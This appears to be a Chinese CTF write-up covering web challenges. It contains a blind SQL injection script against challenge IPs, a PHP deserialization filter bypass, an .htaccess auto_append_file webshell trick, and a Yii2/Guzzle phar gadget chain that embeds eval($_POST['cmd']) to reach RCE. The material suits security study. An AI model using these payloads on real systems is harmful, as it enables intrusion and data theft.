web
easysqli
扫描目录发现login.php
User-Agent: universe PC
Accept: application/flag
注入点:index.php?id=
/index.php?id=1'%26%26if(ascii(substr((select%09database()),1,1))>0,1,0)--%09
# -*- coding: utf-8 -*-
# @Time : 2022/9/26 9:17
# @Author : pysnow
import requests
import re
# web2
# atable,flag,users
# 5.7.31
url = ''
url = "http://39.107.234.204:40957/index.php?id=1'%26%26if({},1,0)--\x09"
payload = "ascii(substr((select group_concat(a.2) from (select 1,2 union select * from users)a),{},1))>{}".replace(
" ", '\x09')
result = ''
proxy = {"http": "127.0.0.1:8080"}
for i in range(1, 100):
head = 27
tail = 150
while head < tail:
mid = (head + tail) >> 1
final = url.format(payload.format(i, mid))
# print(final)
r = requests.get(final)
# print(r.text[2980:])
if '星球名字' in r.text:
head = mid + 1
else:
tail = mid
result += chr(head)
print(result)
通过这个注入得到数据
(自己替换空格)
表名:
select group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()
atable,flag,users
无列名注入:
select group_concat(a.2) from (select 1,2 union select * from users)a
flag表
数据:flag_is_in_login.php
users表
数据:
用户名:administrator
密码:oh_you_got_my_password接着直接在login.php修改一下UA头和Accept头换成指定的关键词登陆就行了
upload
http://39.107.75.148:21106/index.php?source=1拿到源码
class Gethint{
protected $value=0;
public function __destruct(){
echo $this->value;
if($this->value==1)
show_flag();
else
die('nonono');
}
}
$hh=$_GET['hh'];
$hh=str_replace('Gethint', '', $hh);
unserialize($hh);<?php
class Gethint{
protected $value=1;
}
$final = serialize(new Gethint);
$final = str_replace('Gethint','GethGethintint',$final);
echo urlencode($final);
9d7503608bf089e2ffb4fdb7ad1ccd23.php
过滤了php标签,而且又是php5.7以下,可以直接使用php 前端标签,这里我直接使用base64编码绕过
AddType application/x-httpd-php .jpg
php_value auto_append_file php://filter/convert.base64-decode/resource=/var/www/html/upload/820097d390f6d5aa076fb0d1721b0aa4/1.jpg
codereview
yii2框架主控制器源码如下
<?php
namespace app\controllers;
use Yii;
use yii\filters\AccessControl;
use yii\web\BadRequestHttpException;
use yii\web\Controller;
use yii\web\ForbiddenHttpException;
use yii\web\Response;
use yii\web\UploadedFile;
use yii\filters\VerbFilter;
use app\models\LoginForm;
use app\models\ContactForm;
use app\models\UploadForm;
class SiteController extends Controller
{
/**
* {@inheritdoc}
*/
public function behaviors()
{
return [
'access' => [
'class' => AccessControl::className(),
'only' => ['logout'],
'rules' => [
[
'actions' => ['logout'],
'allow' => true,
'roles' => ['@'],
],
],
],
'verbs' => [
'class' => VerbFilter::className(),
'actions' => [
'logout' => ['post'],
],
],
];
}
/**
* {@inheritdoc}
*/
public function actions()
{
return [
'error' => [
'class' => 'yii\web\ErrorAction',
],
'captcha' => [
'class' => 'yii\captcha\CaptchaAction',
'fixedVerifyCode' => YII_ENV_TEST ? 'testme' : null,
],
];
}
/**
* Displays homepage.
*
* @return string
*/
public function actionIndex()
{
return $this->render('index');
}
/**
* Login action.
*
* @return Response|string
*/
public function actionLogin()
{
if (!Yii::$app->user->isGuest) {
return $this->goHome();
}
$model = new LoginForm();
if ($model->load(Yii::$app->request->post()) && $model->login()) {
return $this->goBack();
}
$model->password = '';
return $this->render('login', [
'model' => $model,
]);
}
/**
* Logout action.
*
* @return Response
*/
public function actionLogout()
{
Yii::$app->user->logout();
return $this->goHome();
}
/**
* Displays about page.
*
* @return string
*/
public function actionAbout()
{
return $this->render('about');
}
public function actionUpload()
{
$model = new UploadForm();
if (Yii::$app->request->isPost) {
$model->file = UploadedFile::getInstance($model, 'file');
if ($model->file && $model->validate()) {
$path = 'D:/phpstudy_pro/WWW/5space/uploads/' . $model->file->baseName . '.' . $model->file->extension;
$model->file->saveAs($path);
return $path;
}else{
return json_encode($model->errors);
}
}
return $this->render('upload', ['model' => $model]);
}
}
起了个环境,发现版本是2.0.45,网上没找到现成的链子,但是在upload 目录下给了phar 链子(好心的出题人uploads/phar.jpg),也有上传文件点,直接找触发点
O:41:"PhpOffice\PhpSpreadsheet\Shared\XMLWriter":1:{s:55:" PhpOffice\PhpSpreadsheet\Shared\XMLWriter tempFileName";O:28:"GuzzleHttp\Psr7\AppendStream":2:{s:37:" GuzzleHttp\Psr7\AppendStream streams";a:1:{i:0;O:29:"GuzzleHttp\Psr7\CachingStream":2:{s:43:" GuzzleHttp\Psr7\CachingStream remoteStream";O:22:"Faker\DefaultGenerator":1:{s:10:" * default";b:0;}s:6:"stream";O:26:"GuzzleHttp\Psr7\PumpStream":3:{s:34:" GuzzleHttp\Psr7\PumpStream source";C:32:"Opis\Closure\SerializableClosure":187:{a:5:{s:3:"use";a:0:{}s:8:"function";s:32:"function(){eval($_POST['cmd']);}";s:5:"scope";s:26:"GuzzleHttp\Psr7\PumpStream";s:4:"this";N;s:4:"self";s:32:"000000007a36b6140000000073ec9443";}}s:32:" GuzzleHttp\Psr7\PumpStream size";i:-10;s:34:" GuzzleHttp\Psr7\PumpStream buffer";O:22:"Faker\DefaultGenerator":1:{s:10:" * default";s:1:"j";}}}}s:38:" GuzzleHttp\Psr7\AppendStream seekable";b:1;}}后面有空可以复现一下这个链子
这道题开了debug模式,用的是gii组件,访问:http://39.107.243.76:18517/index.php?r=gii 然后添加拓展
Generator[vendorName]=pysnow&Generator[packageName]=yii2-pysnow&Generator[namespace]=\pysnow\&Generator[type]=yii2-extension&Generator[keywords]=yii2,extension&Generator[license]=Apache-2.0&Generator[title]=pysnow&Generator[description]=pysnow&Generator[authorName]=pysnow&Generator[authorEmail]=pysnow@qq.com&Generator[outputPath]=phar:///tmp/phar.jpg&Generator[template]=default&preview=&cmd=system('cat /flag');
post传参cmd参数,然后RCE